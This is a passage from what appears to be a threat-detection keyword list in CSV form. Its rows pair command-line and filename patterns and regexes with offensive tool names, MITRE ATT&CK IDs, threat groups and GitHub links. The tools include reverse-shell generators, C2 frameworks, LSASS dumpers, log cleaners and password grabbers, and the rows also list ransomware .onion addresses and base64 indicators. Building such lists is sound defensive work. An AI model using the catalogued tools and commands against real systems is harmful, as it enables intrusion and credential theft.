http://*",".{0,1000}python3\s\.\/exp\.py\s\-\-url\shttp\:\/\/.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","0","#linux","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","56100" "*python3 cnc.py*",".{0,1000}python3\scnc\.py.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","56101" "*python3 create_dump.py *",".{0,1000}python3\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56102" "*python3 dump-restore.py*",".{0,1000}python3\sdump\-restore\.py.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","56103" "*python3 fee.py*",".{0,1000}python3\sfee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","56104" "*python3 gcr.py*",".{0,1000}python3\sgcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","56105" "*python3 GetHash.py NtCreateFile*",".{0,1000}python3\sGetHash\.py\sNtCreateFile.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","56106" "*python3 -m http.server 80 > .server 2> 
/dev/null*",".{0,1000}python3\s\-m\shttp\.server\s80\s\>\s\.server\s2\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","56107" "*python3 -m orbitaldump *",".{0,1000}python3\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","56109" "*python3 -m pwncat -lp*",".{0,1000}python3\s\-m\spwncat\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56110" "*python3 -m pwncat -m windows -lp*",".{0,1000}python3\s\-m\spwncat\s\-m\swindows\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56111" "*python3 -m S3Scanner*",".{0,1000}python3\s\-m\sS3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","56112" "*python3 
Ninja.py*",".{0,1000}python3\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","56113" "*python3 ntlmv1.py *",".{0,1000}python3\sntlmv1\.py\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","56114" "*python3 pacu.py*",".{0,1000}python3\spacu\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","56115" "*python3 rsf.py*",".{0,1000}python3\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56116" "*python3 scshell*",".{0,1000}python3\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","56117" "*python3 sitadel*",".{0,1000}python3\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","56118" "*python3 slaver.py *",".{0,1000}python3\sslaver\.py\s.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel 
let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","56119" "*python3 slip.py*",".{0,1000}python3\sslip\.py.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","56120" "*python3 st client wss://*",".{0,1000}python3\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56121" "*python3 st.py*",".{0,1000}python3\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56122" "*python3 start_campaign.py*","python3\sstart_campaign\.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","56123" "*python3 TokenFinder*",".{0,1000}python3\sTokenFinder.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","56124" "*python3*.exe .\nxc*",".{0,1000}python3.{0,1000}\.exe\s\.\\nxc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","56125" "*python3.exe* create_dump.py *",".{0,1000}python3\.exe.{0,1000}\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56126" "*python3??/generator.py*",".{0,1000}python3\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56127" "*python3??/PyLoader.py*",".{0,1000}python3\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56128" "*python3_reverse_tcp.py*",".{0,1000}python3_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","56129" "*python3_reverse_tcp_v2.py*",".{0,1000}python3_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","56130" "*pywerview.py*",".{0,1000}pywerview\.py.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","56131" "*pywhisker.py -*",".{0,1000}pywhisker\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56132" "*pywhisker.py*",".{0,1000}pywhisker\.py.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","56133" "*pywhisker-main*",".{0,1000}pywhisker\-main.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","56134" 
"*pywsus.py*",".{0,1000}pywsus\.py.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","1","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","56135" "*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*",".{0,1000}Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","56136" 
"*Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa*",".{0,1000}Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","56137" "*q7wp5u55lhtuafjtsl6lkt24z4wvon2jexfzhzqqfrt3bqnpqboyqoid.onion*",".{0,1000}q7wp5u55lhtuafjtsl6lkt24z4wvon2jexfzhzqqfrt3bqnpqboyqoid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56139" "*QAX-A-Team/BrowserGhost*",".{0,1000}QAX\-A\-Team\/BrowserGhost.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","56140" 
"*QAX-A-Team/EventCleaner*",".{0,1000}QAX\-A\-Team\/EventCleaner.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","56141" "*QAX-A-Team/EventLogMaster*",".{0,1000}QAX\-A\-Team\/EventLogMaster.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","56142" "*qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion*",".{0,1000}qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56143" "*Qd7SkrRYaGMvOlLz1Qyk3A*",".{0,1000}Qd7SkrRYaGMvOlLz1Qyk3A.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#content","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","56144" "*qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid.onion*",".{0,1000}qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56145" "*qmnmrba4s4a3py6z.onion*",".{0,1000}qmnmrba4s4a3py6z\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56146" "*QmVuamFtaW4gREVMUFk=*",".{0,1000}QmVuamFtaW4gREVMUFk\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56147" "*QmVuamFtaW4gREVMUFk=*",".{0,1000}QmVuamFtaW4gREVMUFk\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 